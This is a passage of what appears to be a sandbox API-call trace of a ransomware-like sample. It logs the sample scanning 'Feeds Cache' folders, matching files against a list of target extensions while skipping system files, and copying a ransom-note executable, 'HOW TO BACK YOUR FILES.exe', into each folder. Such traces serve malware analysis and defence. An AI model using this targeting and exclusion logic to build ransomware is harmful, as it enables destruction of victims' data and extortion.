lstrlenW (lpString="^^^") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0042.206] lstrlenW (lpString="abs") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0042.206] lstrlenW (lpString="abx") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0042.206] lstrlenW (lpString="accdb") returned 5 [0042.206] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0042.206] lstrlenW (lpString="accdc") returned 5 [0042.206] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0042.207] lstrlenW (lpString="accde") returned 5 [0042.207] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0042.207] lstrlenW (lpString="accdr") returned 5 [0042.207] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0042.207] lstrlenW (lpString="accdt") returned 5 [0042.207] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0042.207] lstrlenW (lpString="accdw") returned 5 [0042.207] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0042.207] lstrlenW (lpString="accft") returned 5 [0042.207] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0042.207] lstrlenW (lpString="adb") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0042.207] lstrlenW (lpString="adb") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0042.207] lstrlenW (lpString="ade") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0042.207] lstrlenW (lpString="adf") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0042.207] lstrlenW (lpString="adn") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0042.207] lstrlenW (lpString="adp") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0042.207] lstrlenW (lpString="alf") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0042.207] lstrlenW (lpString="ask") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0042.207] lstrlenW (lpString="btr") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0042.207] lstrlenW (lpString="cat") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0042.207] lstrlenW (lpString="cdb") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0042.207] lstrlenW (lpString="ckp") returned 3 [0042.207] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0042.208] lstrlenW (lpString="cma") returned 3 [0042.208] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0042.208] lstrlenW (lpString="cpd") returned 3 [0042.208] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0042.208] lstrlenW (lpString="dacpac") returned 6 [0042.208] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0042.208] lstrlenW (lpString="dad") returned 3 [0042.208] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0042.208] lstrlenW (lpString="dadiagrams") returned 10 [0042.208] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0042.208] lstrlenW (lpString="daschema") returned 8 [0042.208] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0042.208] lstrlenW (lpString="db-journal") returned 10 [0042.208] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0042.208] lstrlenW (lpString="db-shm") returned 6 [0042.208] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0042.208] lstrlenW (lpString="db-wal") returned 6 [0042.208] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0042.208] lstrlenW (lpString="dbc") returned 3 [0042.208] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0042.208] lstrlenW (lpString="dbs") returned 3 [0042.208] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0042.208] lstrlenW (lpString="dbt") returned 3 [0042.208] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0042.208] lstrlenW (lpString="dbv") returned 3 [0042.208] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0042.208] lstrlenW (lpString="dbx") returned 3 [0042.209] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0042.209] lstrlenW (lpString="dcb") returned 3 [0042.209] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0042.209] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0042.209] lstrcpyW (in: lpString1=0x2e2e8d6, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0042.209] lstrlenW (lpString="index.dat") returned 9 [0042.209] lstrlenW (lpString="Ares865") returned 7 [0042.209] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0042.209] lstrlenW (lpString=".dll") returned 4 [0042.209] lstrcmpiW (lpString1="index.dat", lpString2=".dll") returned 1 [0042.209] lstrlenW (lpString=".lnk") returned 4 [0042.209] lstrcmpiW (lpString1="index.dat", lpString2=".lnk") returned 1 [0042.209] lstrlenW (lpString=".ini") returned 4 [0042.209] lstrcmpiW (lpString1="index.dat", lpString2=".ini") returned 1 [0042.209] lstrlenW (lpString=".sys") returned 4 [0042.209] lstrcmpiW (lpString1="index.dat", lpString2=".sys") returned 1 [0042.209] lstrlenW (lpString="index.dat") returned 9 [0042.209] lstrcpyW (in: lpString1=0x2e2e8d6, lpString2="KQMHSVKD" | out: lpString1="KQMHSVKD") returned="KQMHSVKD" [0042.209] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0042.209] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9c70 [0042.209] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0042.209] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfed03a6b, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KQMHSVKD", cAlternateFileName="")) returned 0 [0042.209] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.209] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0042.209] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.209] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0042.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0042.210] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 67 [0042.210] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.210] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.210] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.215] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.216] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.216] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.216] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.216] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.216] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.216] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.216] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.216] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.216] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.216] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9e3d85, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0042.216] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0042.216] lstrlenW (lpString="desktop.ini") returned 11 [0042.216] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\*") returned 69 [0042.216] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.216] lstrlenW (lpString="desktop.ini") returned 11 [0042.217] lstrlenW (lpString="Ares865") returned 7 [0042.217] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.217] lstrlenW (lpString=".dll") returned 4 [0042.217] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.217] lstrlenW (lpString=".lnk") returned 4 [0042.217] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.217] lstrlenW (lpString=".ini") returned 4 [0042.217] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.217] lstrlenW (lpString=".sys") returned 4 [0042.217] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.217] lstrlenW (lpString="desktop.ini") returned 11 [0042.217] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0042.217] lstrlenW (lpString="fwlink[1]") returned 9 [0042.217] lstrlenW (lpString="Ares865") returned 7 [0042.217] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0042.217] lstrlenW (lpString=".dll") returned 4 [0042.217] lstrcmpiW (lpString1="fwlink[1]", lpString2=".dll") returned 1 [0042.217] lstrlenW (lpString=".lnk") returned 4 [0042.217] lstrcmpiW (lpString1="fwlink[1]", lpString2=".lnk") returned 1 [0042.217] lstrlenW (lpString=".ini") returned 4 [0042.217] lstrcmpiW (lpString1="fwlink[1]", lpString2=".ini") returned 1 [0042.217] lstrlenW (lpString=".sys") returned 4 [0042.217] lstrcmpiW (lpString1="fwlink[1]", lpString2=".sys") returned 1 [0042.217] lstrlenW (lpString="fwlink[1]") returned 9 [0042.217] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0042.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.217] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 67 [0042.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.217] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.218] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.222] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.222] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.222] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.222] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.222] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.222] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.222] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.222] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.222] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.222] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.222] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0042.222] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0042.222] lstrlenW (lpString="desktop.ini") returned 11 [0042.222] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\*") returned 69 [0042.222] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.223] lstrlenW (lpString="desktop.ini") returned 11 [0042.223] lstrlenW (lpString="Ares865") returned 7 [0042.223] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.223] lstrlenW (lpString=".dll") returned 4 [0042.223] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.223] lstrlenW (lpString=".lnk") returned 4 [0042.223] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.223] lstrlenW (lpString=".ini") returned 4 [0042.223] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.223] lstrlenW (lpString=".sys") returned 4 [0042.223] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.223] lstrlenW (lpString="desktop.ini") returned 11 [0042.223] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0042.223] lstrlenW (lpString="fwlink[1]") returned 9 [0042.223] lstrlenW (lpString="Ares865") returned 7 [0042.223] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0042.223] lstrlenW (lpString=".dll") returned 4 [0042.242] lstrcmpiW (lpString1="fwlink[1]", lpString2=".dll") returned 1 [0042.242] lstrlenW (lpString=".lnk") returned 4 [0042.242] lstrcmpiW (lpString1="fwlink[1]", lpString2=".lnk") returned 1 [0042.242] lstrlenW (lpString=".ini") returned 4 [0042.242] lstrcmpiW (lpString1="fwlink[1]", lpString2=".ini") returned 1 [0042.242] lstrlenW (lpString=".sys") returned 4 [0042.242] lstrcmpiW (lpString1="fwlink[1]", lpString2=".sys") returned 1 [0042.242] lstrlenW (lpString="fwlink[1]") returned 9 [0042.243] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.243] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0042.243] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.243] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 67 [0042.243] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.243] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.243] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.249] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.249] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.250] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.250] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.250] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.250] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.250] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.250] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.250] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.250] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.250] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0042.250] lstrlenW (lpString="desktop.ini") returned 11 [0042.250] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\*") returned 69 [0042.250] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.250] lstrlenW (lpString="desktop.ini") returned 11 [0042.250] lstrlenW (lpString="Ares865") returned 7 [0042.250] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.250] lstrlenW (lpString=".dll") returned 4 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.250] lstrlenW (lpString=".lnk") returned 4 [0042.250] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.250] lstrlenW (lpString=".ini") returned 4 [0042.251] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.251] lstrlenW (lpString=".sys") returned 4 [0042.251] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.251] lstrlenW (lpString="desktop.ini") returned 11 [0042.251] lstrcpyW (in: lpString1=0x2e2e8e8, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0042.251] lstrlenW (lpString="fwlink[1]") returned 9 [0042.251] lstrlenW (lpString="Ares865") returned 7 [0042.251] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0042.251] lstrlenW (lpString=".dll") returned 4 [0042.251] lstrcmpiW (lpString1="fwlink[1]", lpString2=".dll") returned 1 [0042.251] lstrlenW (lpString=".lnk") returned 4 [0042.251] lstrcmpiW (lpString1="fwlink[1]", lpString2=".lnk") returned 1 [0042.251] lstrlenW (lpString=".ini") returned 4 [0042.251] lstrcmpiW (lpString1="fwlink[1]", lpString2=".ini") returned 1 [0042.251] lstrlenW (lpString=".sys") returned 4 [0042.251] lstrcmpiW (lpString1="fwlink[1]", lpString2=".sys") returned 1 [0042.251] lstrlenW (lpString="fwlink[1]") returned 9 [0042.251] lstrcpynW (in: lpString1=0x2e2e860, 